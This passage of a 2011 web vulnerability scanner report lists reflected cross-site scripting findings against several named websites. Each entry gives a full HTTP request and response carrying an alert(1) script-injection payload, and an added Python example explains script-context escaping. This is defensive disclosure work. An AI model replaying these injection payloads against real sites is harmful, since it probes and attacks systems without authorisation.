Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=1aef4ce19b0c7295ffe34788ae8d2b26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27599


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 -->
...[SNIP]...

3.129. http://www.vbforums.com/ [86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vbforums.com
Path:   /

Issue detail

The value of the 86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 request parameter is copied into an HTML comment. The payload 5a5d7--><script>alert(1)</script>74c957928d3 was submitted in the 86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the parameter name here is itself the probe from issue 3.130 below, carried over by the crawler (it also appears in the toURL cookie), and the sink is the same "url:" comment: the site echoes the whole query string, parameter names and values alike, so this entry does not describe a second injection point.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=15a5d7--><script>alert(1)</script>74c957928d3 HTTP/1.1
Host: www.vbforums.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bblastvisit=1298042195; bblastactivity=0; QUADIDX=107; intmintc__welcome; toURL=http%3A//www.vbforums.com/%3F86b8b--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E5c1edad1dc6%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:17:37 GMT
Server: Apache
Set-Cookie: bblastactivity=0; expires=Sat, 18-Feb-12 15:17:37 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 143137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1
url: /?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=15a5d7--><script>alert(1)</script>74c957928d3 -->
...[SNIP]...

3.130. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vbforums.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 86b8b--><script>alert(1)</script>5c1edad1dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?86b8b--><script>alert(1)</script>5c1edad1dc6=1 HTTP/1.1
Host: www.vbforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:48 GMT
Server: Apache
Set-Cookie: bblastvisit=1298040768; expires=Sat, 18-Feb-12 14:52:48 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Sat, 18-Feb-12 14:52:48 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 159129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1
url: /?86b8b--><script>alert(1)</script>5c1edad1dc6=1 -->
...[SNIP]...

3.131. http://www.vibrantmedia.com/whatisIntelliTXT.asp [ipid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vibrantmedia.com
Path:   /whatisIntelliTXT.asp

Issue detail

The value of the ipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be08d"><script>alert(1)</script>e28a8bea8e2 was submitted in the ipid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /whatisIntelliTXT.asp?ipid=${ipid}be08d"><script>alert(1)</script>e28a8bea8e2&cc=${cc}&server=${itxtserver} HTTP/1.1
Host: www.vibrantmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92299
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCDQBRBC=GHDMDPOCNOHIJBJAACFHCFBH; path=/
p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
Date: Fri, 18 Feb 2011 14:45:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...
<input type="hidden" name="IPID" value="${ipid}be08d"><script>alert(1)</script>e28a8bea8e2">
...[SNIP]...

3.132. http://www.virtacore.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtacore.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5a33</script><script>alert(1)</script>2f6c2775163 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c5a33</script><script>alert(1)</script>2f6c2775163=1 HTTP/1.1
Host: www.virtacore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 14:52:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11144942;expires=Sun, 10-Feb-2041 14:52:41 GMT;path=/
Set-Cookie: CFTOKEN=96782673;expires=Sun, 10-Feb-2041 14:52:41 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Virtacore Home- Cloud H
...[SNIP]...
<!--
           _uacct='UA-19578445-1';redux.load({uid:'11144942-96782673',history:true, tid:2, tmpid:1, url:'index.cfm', sid:15, query:'c5a33</script><script>alert(1)</script>2f6c2775163=1', name:'index',title:'Virtacore Home- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed Cloud Servers | Virtualization',"resource":[{"type":"CSS","title":"template1CSS","id":"template1
...[SNIP]...
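
Added example, not the scanner's or Virtacore's code: why the remediation detail above says the script context should be avoided rather than escaped. It rebuilds the redux.load(...) sink from the response fragment, encodes the query string two ways (escaping the quote character only, and JSON-encoding with "<", ">" and "&" written as \u escapes), and checks whether an HTML parser would end the <script> element early. The exact <script> wrapper and the function names are assumptions; the payload is the one from this entry.

```python
"""Reflected XSS inside a JavaScript string: why quote-escaping is not enough.

Assumptions (not from the report): the exact <script> wrapper in render_script()
and the function names. The redux.load(...) shape follows the response fragment.
"""
from __future__ import annotations

import json
import re
from typing import Callable


def render_script(query: str, encode: Callable[[str], str]) -> str:
    """Inline script reconstructed from the response: the query string is pasted
    into an object literal, inside an old-style '<!-- ... //-->' wrapper."""
    return (
        "<script>\n<!--\n"
        "redux.load({url:'index.cfm', query:" + encode(query) + ", name:'index'});\n"
        "//-->\n</script>\n"
    )


def quote_escape_only(value: str) -> str:
    """What many sites do (the equivalent of PHP's addslashes): escape the string
    delimiter and backslashes. Correct for the JavaScript parser, irrelevant to the
    HTML parser, which runs first and knows nothing about JS string literals."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def js_string_literal(value: str) -> str:
    """Safe in any <script> context: JSON-encode (quotes, backslashes, control
    characters; with the default ensure_ascii=True also U+2028/2029), then
    \\u-escape '<', '>' and '&' so the output can never contain '</script',
    '<!--' or '-->', the sequences the HTML tokenizer reacts to in script data.
    The result is double-quoted, which is valid wherever the single-quoted
    literal was."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def parse_literal(literal: str) -> str:
    """Decode the literal as a JavaScript engine would (JSON is a subset of JS)."""
    return json.loads(literal)


# How the tokenizer recognises the end of script data: '</script' followed by
# whitespace, '/' or '>', case-insensitively. (Simplification: the real
# tokenizer has extra states for '<!-- <script>' nesting.)
_END_TAG = re.compile(r"</script[\s/>]", re.I)


def script_closes_early(page: str) -> bool:
    """True if the HTML parser would end the <script> element before the
    intended closing tag, i.e. an end tag appears inside the script data."""
    start = page.index("<script>") + len("<script>")
    ends = [m.start() for m in _END_TAG.finditer(page, start)]
    intended = page.rindex("</script>")
    return bool(ends) and ends[0] != intended


if __name__ == "__main__":
    payload = "c5a33</script><script>alert(1)</script>2f6c2775163=1"  # issue 3.132
    for name, enc in (("quote_escape_only", quote_escape_only), ("js_string_literal", js_string_literal)):
        print(f"{name:18} closes early: {script_closes_early(render_script(payload, enc))}")
```

The point the check makes explicit: the browser tokenises the HTML before any JavaScript runs, so a "</script>" inside the string literal ends the element no matter how the quotes are escaped. Only an encoding that removes "<" from the output (or, better, not placing request data in a script block at all) closes the hole.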

3.133. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wi-fihotspotlist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4100a--><script>alert(1)</script>1dd4930cfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?4100a--><script>alert(1)</script>1dd4930cfbd=1 HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 59068

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.wi-fihotspotlist.com with position U
url: /?4100a--><script>alert(1)</script>1dd4930cfbd=1 -->
...[SNIP]...

3.134. http://www.internet.com/sections/asp.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internet.com
Path:   /sections/asp.html

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 26527<a>f1ef85c6ffb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note also that the reflection is in a table cell of class "debug" on an HTTP 500 error page; that debug output is returned to any visitor who triggers the error and is worth reviewing in its own right.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sections/asp.html HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: 26527<a>f1ef85c6ffb
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: CFID=72030; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Set-Cookie: CFTOKEN=AD9023F2-BD82-43AC-9CEDECC5C51C7067; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:01 GMT
Connection: close


                                                                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
...[SNIP]...
<td class="debug" nowrap>26527<a>f1ef85c6ffb</td>
...[SNIP]...

3.135. http://www.internet.com/sections/win.html [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internet.com
Path:   /sections/win.html

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload d27ea<a>18498db0b9f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sections/win.html HTTP/1.1
Host: www.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d27ea<a>18498db0b9f
Connection: close
Cookie: WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; OAX=rcHW801a81gABvEW;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Set-Cookie: CFID=71987; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Set-Cookie: CFTOKEN=35D983F5-72F6-4867-BD6FB322826071B9; Domain=.internet.com; Expires=Sun, 16-Feb-2020 14:58:01 GMT; Path=/
Content-Type: text/html;charset=utf-8
Date: Fri, 18 Feb 2011 14:58:00 GMT
Connection: close


                                                                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
...[SNIP]...
<td class="debug" nowrap>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d27ea<a>18498db0b9f</td>
...[SNIP]...

3.136. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.liverpoolonlinedegrees.co.uk
Path:   /2x/prequal.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d242"><script>alert(1)</script>c13b4e9f625 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. Unlike User-Agent, though, the Referer is derived from the URL of the page the victim came from, so an attacker who can get a victim to follow a link from an attacker-controlled URL has some influence over its value; whether the quote and angle-bracket characters in this payload survive depends on how the victim's browser encodes the query string when it builds the Referer header.

Request

GET /2x/prequal.jsp HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4d242"><script>alert(1)</script>c13b4e9f625

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 15:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=KxHn6svRMsE8juKRCV91xw**.app2-all1; Path=/
Set-Cookie: CLK=0#1298041266572; Expires=Sat, 16-Feb-2019 15:01:06 GMT; Path=/
Set-Cookie: CLK=0#1298041266572; Expires=Sat, 16-Feb-2019 15:01:06 GMT; Path=/
Content-Length: 33038

<!-- Copyright Quinstreet Inc., 2011 -->
<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="A127" Value="http://www.google.com/search?hl=en&q=4d242"><script>alert(1)</script>c13b4e9f625" Type="hidden" tabIndex="15"/>
...[SNIP]...

3.137. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 40f17<script>alert(1)</script>9d9bbfcf6ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=40f17<script>alert(1)</script>9d9bbfcf6ce
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 10232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>9d9bbfcf6ce">40f17<script>alert(1)</script>9d9bbfcf6ce</a>
...[SNIP]...

3.138. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56c7c"><script>alert(1)</script>214ec983f81 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=56c7c"><script>alert(1)</script>214ec983f81
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 9874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title="56c7c"><script>alert(1)</script>214ec983f81">
...[SNIP]...

3.139. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d762"><script>alert(1)</script>580c35d613d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1d762"><script>alert(1)</script>580c35d613d

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:58:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hvqru3oc84p0t9uhs35uhe1f47; path=/
Connection: close
Content-Type: text/html
Content-Length: 18687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html" title="1d762"><script>alert(1)</script>580c35d613d">
...[SNIP]...

3.140. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload b5b73<script>alert(1)</script>09d8451dc31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b5b73<script>alert(1)</script>09d8451dc31

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:58:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lvcmsh7stqdse1kgcaeika84r2; path=/
Connection: close
Content-Type: text/html
Content-Length: 19009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</script>09d8451dc31">b5b73<script>alert(1)</script>09d8451dc31</a>
...[SNIP]...

3.141. http://image.providesupport.com/js/virtacore/safe-monitor.js [vsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/virtacore/safe-monitor.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70132"-alert(1)-"47d14743a97 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/virtacore/safe-monitor.js?ps_h=581W&ps_t=1297999466909 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.powervps.com/cpanel-plesk-vps.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
